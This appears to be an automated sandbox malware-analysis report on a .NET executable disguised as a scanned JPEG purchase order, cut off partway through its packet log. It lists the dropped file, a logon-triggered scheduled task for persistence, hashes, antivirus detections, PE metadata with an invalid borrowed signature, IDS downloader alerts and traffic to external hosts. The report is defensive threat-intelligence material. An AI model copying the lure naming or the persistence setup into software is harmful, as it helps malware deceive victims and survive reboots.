                                                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                                      C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):835592
                                                                                                      Entropy (8bit):7.851572121843778
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:0Ixp/JUVKGUrivb8PLJ4nyF9Vy03dbkX057MIZbSXl8Y4Y+AQ17BNzsD8NE+4kXJ:HfOVKUj8TeQVy03d5QIXXVBNADepJ
                                                                                                      MD5:52F14C343D0B2EC1426E775C6B6569FF
                                                                                                      SHA1:5C61B57A86C14DE578F2425773F190DA35BE62E2
                                                                                                      SHA-256:5994CF17202884F994B3E294FCA7CD9C2847B6C98A0BDB5E65CF164F830197A9
                                                                                                      SHA-512:544359181255DD25C6A6F3A218C785AD79865C2D41B0F462664EFE4CADFF7DFDA4963811A099A5CBDE78856AF4FCF1189278E026FE77AEA0F840CD880C00A060
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....x.g.................~..........N.... ........@.. ....................................@.....................................K........................6........................................................... ............... ..H............text...T|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................0.......H.......4)...r...........................................................0..A....... .........%.....(......... B........%.S...(.....T...(....*.....&*....0..8........s....}.......{.....t....}f....(.....(.....(....*.....&*.0..........~........E....k...>...d...........T...>....{.... .... ....(...+ w..i.!.........(.... .... ....(...+...+..,.. ..... .o..Y.+..+..{....o....(......8s...*.....&~T....v~T....v.~.... ....._ ...._.*..0..........~T.....~...........E................e.......

                                                                                                      C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe:Zone.Identifier

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):26
                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                      Malicious:true
                                                                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Entropy (8bit):7.851572121843778
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                      File name:Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                                      File size:835'592 bytes
                                                                                                      MD5:52f14c343d0b2ec1426e775c6b6569ff
                                                                                                      SHA1:5c61b57a86c14de578f2425773f190da35be62e2
                                                                                                      SHA256:5994cf17202884f994b3e294fca7cd9c2847b6c98a0bdb5e65cf164f830197a9
                                                                                                      SHA512:544359181255dd25c6a6f3a218c785ad79865c2d41b0f462664efe4cadff7dfda4963811a099a5cbde78856af4fcf1189278e026fe77aea0f840cd880c00a060
                                                                                                      SSDEEP:12288:0Ixp/JUVKGUrivb8PLJ4nyF9Vy03dbkX057MIZbSXl8Y4Y+AQ17BNzsD8NE+4kXJ:HfOVKUj8TeQVy03d5QIXXVBNADepJ
                                                                                                      TLSH:9B05124C7A65A601C51E6B33CC930648A7B1894BD731F69B51DC9AE70FA9BCDC04FA83
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....x.g.................~..........N.... ........@.. ....................................@................................

                                                                                                      File Icon

                                                                                                      Icon Hash:90cececece8e8eb0

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x4c9c4e
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:true
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x671A78C2 [Thu Oct 24 16:41:38 2024 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:4
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:4
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:4
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                      Authenticode Signature

                                                                                                      Signature Valid:false
                                                                                                      Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                                                      Error Number:-2146869232
                                                                                                      Not Before, Not After
                                                                                                      • 13/11/2018 00:00:00 08/11/2021 23:59:59
                                                                                                      Subject Chain
                                                                                                      • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                                      Version:3
                                                                                                      Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                                      Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                                      Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                                      Serial:7C1118CBBADC95DA3752C46E47A27438

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      jmp dword ptr [00402000h]
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al

                                                                                                      Data Directories

                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xc9c000x4b.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xca0000x800.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0xc8a000x3608
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xcc0000xc.reloc
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                      Sections

                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x20000xc7c540xc7e0064c2761cc37b2c3c810d1c28909ec490False0.9194418386491557data7.8591431826748455IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                      .rsrc0xca0000x8000x800ec5381d10dfe46fcc18db2a8f4ed78e4False0.33984375data3.4879933336021693IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .reloc0xcc0000xc0x200ddd8fbac1dd381f1bc303af5bfc9bb6aFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                      Resources

                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                      RT_VERSION0xca0900x3a0data0.4224137931034483
                                                                                                      RT_MANIFEST0xca4400x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                      Imports

                                                                                                      DLLImport
                                                                                                      mscoree.dll_CorExeMain

                                                                                                      Network Behavior

                                                                                                      Suricata IDS Alerts

                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                      2024-10-25T09:18:04.545506+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449735193.122.130.080TCP
                                                                                                      2024-10-25T09:18:05.889523+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449735193.122.130.080TCP
                                                                                                      2024-10-25T09:18:06.504984+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449738188.114.97.3443TCP
                                                                                                      2024-10-25T09:18:07.389273+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449740193.122.130.080TCP
                                                                                                      2024-10-25T09:18:08.186206+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449742193.122.130.080TCP
                                                                                                      2024-10-25T09:18:08.779937+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449743193.122.130.080TCP
                                                                                                      2024-10-25T09:18:09.405582+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449745188.114.97.3443TCP
                                                                                                      2024-10-25T09:18:09.889320+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449742193.122.130.080TCP
                                                                                                      2024-10-25T09:18:10.513519+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449747188.114.97.3443TCP
                                                                                                      2024-10-25T09:18:10.896570+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449748188.114.97.3443TCP
                                                                                                      2024-10-25T09:18:11.264267+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449749193.122.130.080TCP
                                                                                                      2024-10-25T09:18:11.993731+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449751188.114.97.3443TCP
                                                                                                      2024-10-25T09:18:12.481315+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449752188.114.97.3443TCP
                                                                                                      2024-10-25T09:18:16.714838+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449761188.114.97.3443TCP
                                                                                                      2024-10-25T09:18:18.216321+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449767188.114.97.3443TCP
                                                                                                      2024-10-25T09:18:19.178788+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449771188.114.97.3443TCP
                                                                                                      2024-10-25T09:18:21.689635+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449775188.114.97.3443TCP

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Oct 25, 2024 09:18:02.415081978 CEST4973580192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:02.420639992 CEST8049735193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:02.420799971 CEST4973580192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:02.420911074 CEST4973580192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:02.426645041 CEST8049735193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:03.298923969 CEST8049735193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:03.305005074 CEST4973580192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:03.310405016 CEST8049735193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:04.494503975 CEST8049735193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:04.545506001 CEST4973580192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:04.640729904 CEST49736443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:04.640775919 CEST44349736188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:04.640837908 CEST49736443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:04.669393063 CEST49736443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:04.669447899 CEST44349736188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:05.305022001 CEST44349736188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:05.305116892 CEST49736443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:05.316490889 CEST49736443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:05.316543102 CEST44349736188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:05.317656040 CEST44349736188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:05.358016014 CEST49736443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:05.422760963 CEST49736443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:05.467341900 CEST44349736188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:05.561542034 CEST44349736188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:05.561815023 CEST44349736188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:05.561883926 CEST49736443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:05.569827080 CEST49736443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:05.574465036 CEST4973580192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:05.579874039 CEST8049735193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:05.732852936 CEST8049735193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:05.739933968 CEST49738443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:05.739979029 CEST44349738188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:05.740051985 CEST49738443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:05.740621090 CEST49738443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:05.740641117 CEST44349738188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:05.889523029 CEST4973580192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:06.362864971 CEST44349738188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:06.365336895 CEST49738443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:06.365380049 CEST44349738188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:06.505076885 CEST44349738188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:06.505305052 CEST44349738188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:06.505517006 CEST49738443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:06.515547991 CEST49738443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:06.522361040 CEST4974080192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:06.522361994 CEST4973580192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:06.528230906 CEST8049735193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:06.528578997 CEST8049740193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:06.528584957 CEST4973580192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:06.528830051 CEST4974080192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:06.529268026 CEST4974080192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:06.535057068 CEST8049740193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:07.213610888 CEST8049740193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:07.215579033 CEST49741443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:07.215614080 CEST44349741188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:07.215687990 CEST49741443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:07.216144085 CEST49741443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:07.216156006 CEST44349741188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:07.301635027 CEST4974280192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:07.308387041 CEST8049742193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:07.308502913 CEST4974280192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:07.308840990 CEST4974280192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:07.314671993 CEST8049742193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:07.389272928 CEST4974080192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:07.833147049 CEST44349741188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:07.835344076 CEST49741443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:07.835426092 CEST44349741188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:07.969799042 CEST8049742193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:07.973526955 CEST44349741188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:07.973839998 CEST44349741188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:07.973923922 CEST49741443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:07.974271059 CEST49741443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:07.974605083 CEST4974280192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:07.978060007 CEST4974080192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:07.979105949 CEST4974380192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:07.980001926 CEST8049742193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:07.984163046 CEST8049740193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:07.984366894 CEST4974080192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:07.984680891 CEST8049743193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:07.984755039 CEST4974380192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:07.984869957 CEST4974380192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:07.990391970 CEST8049743193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:08.132110119 CEST8049742193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:08.179733992 CEST49744443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:08.179831028 CEST44349744188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:08.179939032 CEST49744443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:08.184767008 CEST49744443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:08.184806108 CEST44349744188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:08.186206102 CEST4974280192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:08.649631977 CEST8049743193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:08.651253939 CEST49745443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:08.651310921 CEST44349745188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:08.651499987 CEST49745443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:08.652051926 CEST49745443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:08.652069092 CEST44349745188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:08.779937029 CEST4974380192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:09.034157038 CEST44349744188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:09.034286976 CEST49744443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:09.158159018 CEST49744443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:09.158263922 CEST44349744188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:09.159482002 CEST44349744188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:09.266041040 CEST44349745188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:09.268408060 CEST49745443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:09.268446922 CEST44349745188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:09.278358936 CEST49744443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:09.405666113 CEST44349745188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:09.405925035 CEST44349745188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:09.405997038 CEST49745443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:09.406366110 CEST49745443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:09.411640882 CEST4974680192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:09.417081118 CEST8049746193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:09.417292118 CEST4974680192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:09.417397976 CEST4974680192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:09.422869921 CEST8049746193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:09.438230991 CEST49744443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:09.479341984 CEST44349744188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:09.577152014 CEST44349744188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:09.577241898 CEST44349744188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:09.577307940 CEST49744443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:09.581196070 CEST49744443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:09.587796926 CEST4974280192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:09.593327045 CEST8049742193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:09.761153936 CEST8049742193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:09.763168097 CEST49747443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:09.763221025 CEST44349747188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:09.763433933 CEST49747443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:09.763817072 CEST49747443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:09.763838053 CEST44349747188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:09.889319897 CEST4974280192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:10.125269890 CEST8049742193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:10.125349045 CEST4974280192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:10.125893116 CEST8049746193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:10.127906084 CEST49748443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:10.127947092 CEST44349748188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:10.128016949 CEST49748443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:10.128557920 CEST49748443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:10.128575087 CEST44349748188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:10.186449051 CEST4974680192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:10.371855021 CEST44349747188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:10.374244928 CEST49747443192.168.2.4188.114.97.3
